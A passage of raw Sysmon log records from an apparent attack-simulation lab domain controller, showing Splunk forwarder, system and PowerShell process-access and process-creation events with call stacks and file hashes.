Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028857Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:10.239{7901BC46-53C6-6008-9406-00000000A301}948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000028882Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.753{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-53C7-6008-9606-00000000A301}6296C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028881Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.753{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028880Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.753{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028879Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.753{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028878Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.753{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028877Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.753{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-53C7-6008-9606-00000000A301}6296C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028876Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.753{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-53C7-6008-9606-00000000A301}6296C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028875Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.754{7901BC46-53C7-6008-9606-00000000A301}6296C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000028874Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.238{7901BC46-53C7-6008-9506-00000000A301}43886420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028873Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.082{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-53C7-6008-9506-00000000A301}4388C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028872Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.082{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028871Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.082{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028870Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.082{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028869Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.082{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028868Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.082{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-53C7-6008-9506-00000000A301}4388C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028867Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.082{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-53C7-6008-9506-00000000A301}4388C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028866Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:11.083{7901BC46-53C7-6008-9506-00000000A301}4388C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000028928Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.956{7901BC46-4FA9-6008-4305-00000000A301}74203768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF80592ED53) 10341000x800000000000000028927Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.956{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028926Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.956{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028925Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.956{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028924Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.956{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028923Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.956{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028922Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.956{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028921Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:19.956{7901BC46-4FA9-6008-4305-00000000A301}74203768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49603743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496035b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49685de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495fc19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a0b5392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495c4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49622e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(w